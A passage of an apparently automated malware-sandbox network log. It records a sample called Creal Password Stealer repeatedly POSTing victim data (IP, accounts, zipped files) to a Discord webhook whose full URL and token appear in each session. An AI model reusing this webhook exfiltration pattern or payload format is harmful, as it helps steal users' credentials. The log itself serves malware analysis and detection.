2024-09-27 16:18:49 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 52 7a 54 6d 66 57 78 6f 56 52 42 67 4c 51 41 66 35 5f 2e 32 2e 35 68 6c 72 59 45 79 6d 52 56 32 70 46 6c 54 66 31 32 50 6c 63 30 2d 31 37 32 37 34 35 33 39 32 39 32 39 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 31 62 64 30 33 34 32 39 31 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=RzTmfWxoVRBgLQAf5_.2.5hlrYEymRV2pFlTf12Plc0-1727453929294-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfd1bd034291-EWR
2024-09-27 16:18:49 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49716	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:49 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:49 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:18:49 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:49 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2dbb081e7cec11efa56b768b656d6a57; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 3 x-ratelimit-reset: 1727453931 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tesq4q%2Fof5N%2FfOFagtamVLpkr6i9eeYF3bBeKAbDld1TyVPqX%2FHpV3t4la270yHU9z4nH4mjDEsQYdhSuHpvNeiOwxwIZDqBxVyhGAw0rfVPAivJJDrvTLEDPNPz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2dbb081e7cec11efa56b768b656d6a57312e2dc54f683e071f75ea25684146e12ad81c1e4d85666697e737dad60ad7b1; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=27daf6c2fc89799e3442095c271b0cbbbb308515-1727453929; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:49 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 31 30 47 6f 54 55 75 58 4b 38 50 46 4f 6e 2e 45 59 53 5f 4d 48 66 58 6e 4b 67 52 4c 34 44 2e 31 71 71 52 7a 53 6b 53 58 38 6c 4d 2d 31 37 32 37 34 35 33 39 32 39 33 33 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 31 65 65 34 66 34 32 63 34 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=10GoTUuXK8PFOn.EYS_MHfXnKgRL4D.1qqRzSkSX8lM-1727453929331-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfd1ee4f42c4-EWR
2024-09-27 16:18:49 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49718	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:49 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:49 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:18:50 UTC	1367	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:49 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2e1d43587cec11efaceb3afbab16203a; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 3 x-ratelimit-reset: 1727453931 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1jcsZ632z4wAIayU2OyvV%2BxWivQLiijJaTylQFpILiWNmiohksX1E%2FSbLTnddCUoGmWYRI9Q%2FJCzEAlAhm2BPPucdNJ4fObq0OMSaVdmH%2BJBUtkDuGM5dQJghEC5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2e1d43587cec11efaceb3afbab16203a57f8b4487d16c7ea1e5af554e299d0a89a98c2725a43224f2fef5231ab51d425; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=27daf6c2fc89799e3442095c271b0cbbbb308515-1727453929; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:50 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 4b 71 33 62 52 57 72 4c 6b 73 73 71 5f 39 75 43 68 6a 78 4b 43 39 4b 34 47 43 56 33 6d 33 33 4c 4a 58 38 4c 31 67 35 66 52 51 6f 2d 31 37 32 37 34 35 33 39 32 39 39 36 39 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 35 66 38 66 39 34 31 61 39 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=Kq3bRWrLkssq_9uChjxKC9K4GCV3m33LJX8L1g5fRQo-1727453929969-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfd5f8f941a9-EWR
2024-09-27 16:18:50 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49719	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:49 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:49 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:18:50 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:50 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2e25bae27cec11efba92de6f7e04d91f; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 2 x-ratelimit-reset: 1727453931 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SFPou7Ly7EDyqnIeOmgLepZnN4qr4%2FDnPO4qKzS7fJE3FX8ptyTUiLopbsveCR1hjF3sctXpnzMhxRiXzJj324dOVk3J%2Fq%2BvE0y14AkezjGAdEjlI9ucHxkDN86d"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2e25bae27cec11efba92de6f7e04d91f7cc0110f1e71e2488bdd99cb271f4663c7c2ab2858b5b61a107ad4fd00dcf7ad; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=73103136ee7e8e53491775a072108632c5d8fb76-1727453930; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:50 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 42 6e 4e 36 45 2e 78 6f 43 79 43 6e 38 35 39 6f 65 59 79 47 73 75 44 48 4f 65 53 4c 79 6e 2e 6d 4c 52 76 78 37 75 64 4b 6a 75 6b 2d 31 37 32 37 34 35 33 39 33 30 30 32 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 36 34 66 37 61 34 32 35 64 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=BnN6E.xoCyCn859oeYyGsuDHOeSLyn.mLRvx7udKjuk-1727453930026-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfd64f7a425d-EWR
2024-09-27 16:18:50 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49721	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:50 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:50 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:18:50 UTC	1341	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:50 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2e8e70147cec11efa1e1a6a6d338c935; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 3 x-ratelimit-reset: 1727453932 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ui0h6LY2TA975PP8hrbL6Rn9ed5x4e4A%2F4iYiZNAZxOhND%2BBUzXoNM%2BqomWdmTF%2F0OzbxZnSaOsqZb%2FqL%2BlEfWU7OXyAYITzA7f7WHeod8vdS13GHA5tw4wVfA0L"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2e8e70147cec11efa1e1a6a6d338c935d787564224f81a52ba35e29a80bd3a864c9f3775dde1657035d4b8bbe7a36439; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=73103136ee7e8e53491775a072108632c5d8fb76-1727453930; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:50 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 72 52 55 58 43 73 36 62 54 71 36 45 44 62 47 34 4a 6d 31 50 67 6b 59 50 5a 4d 4f 42 66 39 48 35 55 33 69 4b 33 70 73 72 79 45 63 2d 31 37 32 37 34 35 33 39 33 30 37 31 32 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 61 33 63 66 39 38 63 36 63 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=rRUXCs6bTq6EDbG4Jm1PgkYPZMOBf9H5U3iK3psryEc-1727453930712-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfda3cf98c6c-EWR
2024-09-27 16:18:50 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49722	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:50 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:50 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:18:50 UTC	1339	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:50 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2e9d8b4e7cec11ef852fbe573e76249d; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 2 x-ratelimit-reset: 1727453932 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0wrL88lead%2Fx6hy8klXu4pPvtZEpI%2F0pDKopLHw7GL6t456npHX5FKS22j%2Fn1G7kDjndp3k%2Fn8tw9CSDRAW5YKwd6MTMDvLkYb5mIMuFWbfrOOH%2FtntcWm5HgTF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2e9d8b4e7cec11ef852fbe573e76249d67437e93f77931898004f1f78a6698ac2ddbba2c8d61e800e8f47dcd5912d425; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=73103136ee7e8e53491775a072108632c5d8fb76-1727453930; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:50 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 79 37 71 59 45 6b 66 65 62 30 51 44 79 68 64 4c 39 63 76 46 34 38 6a 49 68 4a 6c 57 48 54 6e 78 56 6a 33 67 6d 36 38 32 54 4a 67 2d 31 37 32 37 34 35 33 39 33 30 38 31 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 62 30 63 64 38 34 34 31 34 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=y7qYEkfeb0QDyhdL9cvF48jIhJlWHTnxVj3gm682TJg-1727453930811-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfdb0cd84414-EWR
2024-09-27 16:18:50 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49724	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:51 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
